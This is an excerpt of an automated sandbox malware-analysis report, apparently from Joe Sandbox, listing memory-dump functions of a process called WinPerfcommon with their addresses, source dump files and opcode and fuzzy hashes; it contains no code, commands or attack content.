                                                                                      Function 00007FFD9B805745 Relevance: .1, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3cfb3965a07063da61d04dff133bb35125a4e0362b95e8ef55e663e6a1d0cca1
                                                                                      • Instruction ID: 6ae7605a8170bfe91c3aca2b3081d18aa69362ef7a290f2e8a02ca9b90dbea95
                                                                                      • Opcode Fuzzy Hash: 3cfb3965a07063da61d04dff133bb35125a4e0362b95e8ef55e663e6a1d0cca1
                                                                                      • Instruction Fuzzy Hash: E8215430F2D90D8BE7B4EB5494A66F97391FF4C741F5101B5D88DD32B2EE286E444681
                                                                                      Function 00007FFD9BC19FC0 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4f39207a5259421dcd0c5abefe902dc7ac54ac2673b61d1db63457159401ed4e
                                                                                      • Instruction ID: c4471b37d5c96606ac1053ad93fb27d234d036698693c1b3764aab41e9fd96b0
                                                                                      • Opcode Fuzzy Hash: 4f39207a5259421dcd0c5abefe902dc7ac54ac2673b61d1db63457159401ed4e
                                                                                      • Instruction Fuzzy Hash: 47113D10A1D42E87F73C82A840709BC7795FF90300B159579E0AB974FAC83CBA8193C0
                                                                                      Function 00007FFD9BC14950 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 17662f2b8418c96938b10e79778d76e1c84806681317de2ed3fc2d7fd79c8626
                                                                                      • Instruction ID: 2a1b46a0fbfa16f9280d34e25f3f5e05ea03ddc62f9ac2dc50a5bd9fb95f4088
                                                                                      • Opcode Fuzzy Hash: 17662f2b8418c96938b10e79778d76e1c84806681317de2ed3fc2d7fd79c8626
                                                                                      • Instruction Fuzzy Hash: B5112B10B2E46E56F63CCA5890B44BC7391FB91302B16567DC45B9B4AAC92CFAC1DB80
                                                                                      Function 00007FFD9BC12CE9 Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 71ab0fca097b17464cfc172dacdc42311caab825ab3144fbd571b1418ee35db9
                                                                                      • Instruction ID: 64fab1e3cfacc336a907e279ae06c6b7bd0b4aa2f6db394a850d62906dd04f35
                                                                                      • Opcode Fuzzy Hash: 71ab0fca097b17464cfc172dacdc42311caab825ab3144fbd571b1418ee35db9
                                                                                      • Instruction Fuzzy Hash: 4A115732A0A28D5FE76197F088281BA3BB1DF16340F0600B6D44AEB1A2CD68294AC361
                                                                                      Function 00007FFD9BC1282C Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1edde3efc25dab581658cc08277b731d80ab52fa3edc3516c1700531ab753175
                                                                                      • Instruction ID: ec8e897787384456051890da7b712ddea146aa18661dce7b737606d09eb6380c
                                                                                      • Opcode Fuzzy Hash: 1edde3efc25dab581658cc08277b731d80ab52fa3edc3516c1700531ab753175
                                                                                      • Instruction Fuzzy Hash: 8611A731B09A1C8FD758DF68D8A96BCB3E1FF59315B0101BED04ED75A1CA216941CB11
                                                                                      Function 00007FFD9BC19040 Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 15d1401b03f0a1b4e0d877405d262f2a90a9d3b8d4ce8acfb52677305ff0982d
                                                                                      • Instruction ID: c3014572cc03b9656545f1396edf650a61ffd3bf46e9ee3770e0c5358a9790cf
                                                                                      • Opcode Fuzzy Hash: 15d1401b03f0a1b4e0d877405d262f2a90a9d3b8d4ce8acfb52677305ff0982d
                                                                                      • Instruction Fuzzy Hash: 90110430B19A4D8EDB65EB7584248FA73E0EF58341B41057AD40FC75E2CE28BA468790
                                                                                      Function 00007FFD9BC1E300 Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 068c0f1e74306bcd9dc4cc8b391f9725ff30a8cb451fb5103dfc846617edc4d5
                                                                                      • Instruction ID: 68ce5185241460502dff4a1b01ced0c43dd343c04a69273f2d43be6968d82e57
                                                                                      • Opcode Fuzzy Hash: 068c0f1e74306bcd9dc4cc8b391f9725ff30a8cb451fb5103dfc846617edc4d5
                                                                                      • Instruction Fuzzy Hash: 71110131B19A4E8FDBA5EB7094218FD73A0EF54351B41057AD40FC75E2CE28BA458750
                                                                                      Function 00007FFD9BC101A8 Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e3f1c053a9eb9262d676b50c01194a68a1037ab20b8d4c7fea3d2e44e8b47787
                                                                                      • Instruction ID: ec23188dbccd7f0bd53bd80c37485bec7097aaa97629cf4d36a828d22f43a584
                                                                                      • Opcode Fuzzy Hash: e3f1c053a9eb9262d676b50c01194a68a1037ab20b8d4c7fea3d2e44e8b47787
                                                                                      • Instruction Fuzzy Hash: 52112671F0EA4D8FE7B555B848682BD37E1EF96380F02153AE40EF71A1DD682E068391
                                                                                      Function 00007FFD9BC139D0 Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6284c5c0f949b398d367cbbc6de7b98102a1f86fca9b6d0158e126253b1db284
                                                                                      • Instruction ID: 6b987e8535a50124ac0f0051ea754715c933c8cd4864875ef154a8bab7b150db
                                                                                      • Opcode Fuzzy Hash: 6284c5c0f949b398d367cbbc6de7b98102a1f86fca9b6d0158e126253b1db284
                                                                                      • Instruction Fuzzy Hash: AC110431B2AA8D8ED7A9ABA480608F9B390EF94301B41457AD44FC75E2CE38BA458750
                                                                                      Function 00007FFD9BC1744E Relevance: .1, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3c3f663f1508f41d59069e40b6d8aab9dff4c68a25813bf7326090d9d07be906
                                                                                      • Instruction ID: f7d88f9e1575b356012f10cfa97cb37e0c5ba569ac6757f3513bf677c84fb325
                                                                                      • Opcode Fuzzy Hash: 3c3f663f1508f41d59069e40b6d8aab9dff4c68a25813bf7326090d9d07be906
                                                                                      • Instruction Fuzzy Hash: DA110A71A1991D8FDF9CDB68D465AFDB7A1FB98310F4111BED00EE36A1CE3569408B40
                                                                                      Function 00007FFD9BC1C68E Relevance: .1, Instructions: 60COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2aade8eddf9ab4625bf8bad2ff43d6bfdfd6ccb476d8b7d6eb2d20232f33f745
                                                                                      • Instruction ID: ab256874b0a88cb594664c8880f8bf3b0f6527f065f3b64eda66ac90fbae0aeb
                                                                                      • Opcode Fuzzy Hash: 2aade8eddf9ab4625bf8bad2ff43d6bfdfd6ccb476d8b7d6eb2d20232f33f745
                                                                                      • Instruction Fuzzy Hash: 1311F935A1991D9EDB98DB68C4A5ABDB7B1EB58301F0111BEE00EE6691CE25A9408B00
                                                                                      Function 00007FFD9BC1384E Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9980535cf9d95019ba671cd217d0b3ab92ee7750cc0e5fc2509a236e391c4969
                                                                                      • Instruction ID: 04c22f3154a51340254caafd712db7a0eaff8213f77285c06680ac79bba183d2
                                                                                      • Opcode Fuzzy Hash: 9980535cf9d95019ba671cd217d0b3ab92ee7750cc0e5fc2509a236e391c4969
                                                                                      • Instruction Fuzzy Hash: B511443130A64E8FE7299FA8D4686E87390EF95365F01417AD80EC76E1CB35AA40C751
                                                                                      Function 00007FFD9BC18EBE Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5b785cd23cc77ffd2abbf981334bb2db88bbfbb0cac5f00812c04b949f15be55
                                                                                      • Instruction ID: 26150123b260e1419e201add3008e1d62e82672ae941d4967741fd85893c4157
                                                                                      • Opcode Fuzzy Hash: 5b785cd23cc77ffd2abbf981334bb2db88bbfbb0cac5f00812c04b949f15be55
                                                                                      • Instruction Fuzzy Hash: F811883170960E8FE7199E64D8286F87390EF58351F01017AD80EC76E1CF76AA40CB90
                                                                                      Function 00007FFD9BC1E17E Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a60d11b3526bb5b9755dc894180b5394e14be369e809710b672c8534c420eb67
                                                                                      • Instruction ID: d3e29c1e511feaf1e89610c20e9d7db8ac40ab83e7362aad2a6f2b201403bf91
                                                                                      • Opcode Fuzzy Hash: a60d11b3526bb5b9755dc894180b5394e14be369e809710b672c8534c420eb67
                                                                                      • Instruction Fuzzy Hash: B611443130964F8FE72A9EA8D8246F87390EF59351F05017AE80EC76E1CB39BA808750
                                                                                      Function 00007FFD9B800C38 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7af69aa86139fca599b832fd10a0ff9ae8738803d072db97e4ce871c24fa627f
                                                                                      • Instruction ID: 2172ad9eab4b456b141e1915e5fc71fbfdcf5b60544fd533637a8485e910fd20
                                                                                      • Opcode Fuzzy Hash: 7af69aa86139fca599b832fd10a0ff9ae8738803d072db97e4ce871c24fa627f
                                                                                      • Instruction Fuzzy Hash: 80110232B1E68C8FE712DBB488211ED7BB0EF46751F0640B3C084CB1A2D93817468790
                                                                                      Function 00007FFD9B800C40 Relevance: .1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 24551e8d8040271d05b99837cc2ba9bc908f0723b219946f3ee3bd7f7e2c6e27
                                                                                      • Instruction ID: 6c98313ee37c5ed48467294637d4c5664db326fdc68d5d73d0d62905e6115982
                                                                                      • Opcode Fuzzy Hash: 24551e8d8040271d05b99837cc2ba9bc908f0723b219946f3ee3bd7f7e2c6e27
                                                                                      • Instruction Fuzzy Hash: E401AD32A1E68C8FE712DBA488651DD7BB0EF46751F1641B3D084DB2A2D9386B458790
                                                                                      Function 00007FFD9BC16CFE Relevance: .0, Instructions: 50COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ae62ddb4bd17c2dffdd6b705241a8343772a314ce4f2a5c351ad0cec65ecc7d
                                                                                      • Instruction ID: 8ab9ef447dfa16c443e3b97e4262da87f27ad7b9db8eb542325888111a09c8ad
                                                                                      • Opcode Fuzzy Hash: 9ae62ddb4bd17c2dffdd6b705241a8343772a314ce4f2a5c351ad0cec65ecc7d
                                                                                      • Instruction Fuzzy Hash: 80F0A431B0CA4C4FD758AF2CA81A6BD73D1EF99321B05017FE44EC75A6CE2169424746
                                                                                      Function 00007FFD9BC1BB82 Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 180eac2a948bb9d892793b939aae77a33d3392905778c3d28b713d5b53326d7a
                                                                                      • Instruction ID: f1fcbe75fd9876ad1bfa7440e7367cc0b1d2bf1a4cd27c925594e9a8495383c2
                                                                                      • Opcode Fuzzy Hash: 180eac2a948bb9d892793b939aae77a33d3392905778c3d28b713d5b53326d7a
                                                                                      • Instruction Fuzzy Hash: 6511B034E1981EDFDBA8DB98D8A09ADBBB1FF58300F111179D00EE32A5DA346941CB54
                                                                                      Function 00007FFD9B800C48 Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b5f0118f9421447213b2917b482dddda60003c7a6e9ddfb91e6c9fe75d7c5022
                                                                                      • Instruction ID: 38eca850e41f001720af78d77d23a3d04634e5609320f621ab8f720c3b4d207f
                                                                                      • Opcode Fuzzy Hash: b5f0118f9421447213b2917b482dddda60003c7a6e9ddfb91e6c9fe75d7c5022
                                                                                      • Instruction Fuzzy Hash: CA018832A1E28C9FD712EBA488641D97BB0AF46714F1681E7D084DB2A2DA386A458790
                                                                                      Function 00007FFD9BC11FDB Relevance: .0, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10529a4c2383f876b019270642bd7cd3a795baeed907a56505a435ec4f19005a
                                                                                      • Instruction ID: 1a222f8513650f7e8fb77d101a2d97c9397fdc2dded5e51e0235a58612a47aec
                                                                                      • Opcode Fuzzy Hash: 10529a4c2383f876b019270642bd7cd3a795baeed907a56505a435ec4f19005a
                                                                                      • Instruction Fuzzy Hash: A901123094894C8FCF98EF58C854FD9B7B4EBA8315F1501A9D40DE7291DA359AC1CB40
                                                                                      Function 00007FFD9BC11FDA Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ca75dcf869e21a7f9b6f9c224c65f32e02ff33b968b596de2f6242cf39f3084e
                                                                                      • Instruction ID: a3992b928de0e50368ccc1f5fd8f3a64923667b7a133049d7771b6df7c56c9c8
                                                                                      • Opcode Fuzzy Hash: ca75dcf869e21a7f9b6f9c224c65f32e02ff33b968b596de2f6242cf39f3084e
                                                                                      • Instruction Fuzzy Hash: 2601FF3094894C8FDF98EF58C858BD8B7B0EBA8315F1501A9D40DE7291DA359AC1CB40
                                                                                      Function 00007FFD9BC17319 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 216f112a683d6ec460ef6fb78542a631bc8410ed6e9ed0cab6bdaefcbcb859cf
                                                                                      • Instruction ID: 2a7d13c7aba454b3b04ad87da856dd35c6aba25600d8a0ff08c68120337e26f0
                                                                                      • Opcode Fuzzy Hash: 216f112a683d6ec460ef6fb78542a631bc8410ed6e9ed0cab6bdaefcbcb859cf
                                                                                      • Instruction Fuzzy Hash: 5A01E171A0955D8FDF98EF98C464AACB7B1FF64300F4505BED40EE72A1DA356940CB00
                                                                                      Function 00007FFD9B800C50 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 83297148ab0c6316a73d9909b8530ff91b3cc8df726bb7015609a51bf5c00e6d
                                                                                      • Instruction ID: c7695f1434e132a2724b46dc057794d73daafc846577c9ea229b78936f5b69cc
                                                                                      • Opcode Fuzzy Hash: 83297148ab0c6316a73d9909b8530ff91b3cc8df726bb7015609a51bf5c00e6d
                                                                                      • Instruction Fuzzy Hash: F7018B31E1E38D9FE712EBB488645DD7BB0AF4A704F1641E3D084CB2A6DA386B448741
                                                                                      Function 00007FFD9B805843 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 43acc274d1bd756054351bdfc031db983fc5327fac3aa7f1e03da3bfc95b0f01
                                                                                      • Instruction ID: aca18483f9a14f1ee9c76ad1c9e69d3627dc77412cee3037b977b1b47e0ff202
                                                                                      • Opcode Fuzzy Hash: 43acc274d1bd756054351bdfc031db983fc5327fac3aa7f1e03da3bfc95b0f01
                                                                                      • Instruction Fuzzy Hash: E5016D30A1941E8BEB74AB44D8A17F873A1FF5C341F5140B9C88ED32A2DE286A858A41
                                                                                      Function 00007FFD9BC12052 Relevance: .0, Instructions: 39COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 682885edad4bb039fc7850656ff89fffd6aca147bbfe74bb510d9b1eb40e0c72
                                                                                      • Instruction ID: 45884cfb4e1c823180b5bd0abef31041be4277f4cf2448cf28c60cb5d1d06d3d
                                                                                      • Opcode Fuzzy Hash: 682885edad4bb039fc7850656ff89fffd6aca147bbfe74bb510d9b1eb40e0c72
                                                                                      • Instruction Fuzzy Hash: EAF0623554F2899FD7229FF088619D93FB8AF43304B1601F6D099CA0A2C56C5656D761
                                                                                      Function 00007FFD9BC17722 Relevance: .0, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: feb26e1c93c6441cbc12d02b7601269257d3044efff7aeb66dc64fbd9ef112fc
                                                                                      • Instruction ID: 911a60423dc2284e070f12fa9d54c2aee33cf8c6d6be7e5dd5e47102b5aec21d
                                                                                      • Opcode Fuzzy Hash: feb26e1c93c6441cbc12d02b7601269257d3044efff7aeb66dc64fbd9ef112fc
                                                                                      • Instruction Fuzzy Hash: 2AF0623144E3C99FD3139BB098658E93FB4AF43214B0A00E7E485CB0B2CA281B16C762
                                                                                      Function 00007FFD9B8035BC Relevance: .0, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f131cdbf0dfa6322443be61ace51dfa1acdb266482be4766e9fa604efc92c401
                                                                                      • Instruction ID: b4f86246781e07d7f64bac908c6b48f5c465ea881a8782902f820063f60c8a50
                                                                                      • Opcode Fuzzy Hash: f131cdbf0dfa6322443be61ace51dfa1acdb266482be4766e9fa604efc92c401
                                                                                      • Instruction Fuzzy Hash: 88F0CD30A08A188FDB55DF08C895AAA73B1FBAC351F0141A9D44EE7260DA35AE45CF81
                                                                                      Function 00007FFD9BC183AA Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 17aeb6139997246513adf14df41aeb352fb64dc72d24038c58aafd2696b677f7
                                                                                      • Instruction ID: 59a1c8e0d50d7ec83bddc1207ffb507f1111baffd98bd74a9177cbee5e4c3e90
                                                                                      • Opcode Fuzzy Hash: 17aeb6139997246513adf14df41aeb352fb64dc72d24038c58aafd2696b677f7
                                                                                      • Instruction Fuzzy Hash: BBF0962160D28A4FDB228BB48CA01A93FA0DF1731074D06F9C484AB1E7E5A47516D351
                                                                                      Function 00007FFD9BC1D65A Relevance: .0, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0b9a85c05501c1235162c48a7518a63e2996b5a34fb9de526aa57b0ae160b5d5
                                                                                      • Instruction ID: b84ed116df3977b3ad34886782fe3ac46c998aec4984f88e63dc34b7fd5ce0c8
                                                                                      • Opcode Fuzzy Hash: 0b9a85c05501c1235162c48a7518a63e2996b5a34fb9de526aa57b0ae160b5d5
                                                                                      • Instruction Fuzzy Hash: F7F0962160E3C64FDB225BB48CA10A83FA0DF1731071A1AF9C4889B1E7D5586615D711
